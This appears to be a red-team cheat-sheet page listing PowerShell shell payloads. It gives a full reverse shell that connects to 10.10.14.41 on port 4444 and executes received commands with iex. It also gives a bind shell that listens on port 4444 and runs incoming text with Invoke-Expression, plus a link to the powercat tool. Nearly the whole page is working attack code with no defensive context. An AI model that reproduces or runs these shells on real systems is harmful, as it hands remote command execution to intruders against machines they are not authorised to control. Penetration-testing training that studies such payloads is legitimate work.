Operator On The Wire
RED TEAM / SHELLS / PAYLOADS

POWERSHELL

Revshell

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.41',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()};
$client.Close()

https://github.com/besimorhino/powercat

Bind Shell - Internal All The Things

Bind Shell

$listener = [System.Net.Sockets.TcpListener]4444
$listener.Start()
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$writer.AutoFlush = $true
while ($true) {
    $data = New-Object System.Byte[] 1024
    $bytesRead = $stream.Read($data, 0, $data.Length)
    if ($bytesRead -le 0) { break }
    $command = ([System.Text.Encoding]::ASCII).GetString($data, 0, $bytesRead)
    try {
        $output = Invoke-Expression -Command $command 2>&1 | Out-String
    } catch {
        $output = $_.Exception.Message
    }
    $writer.WriteLine($output)
}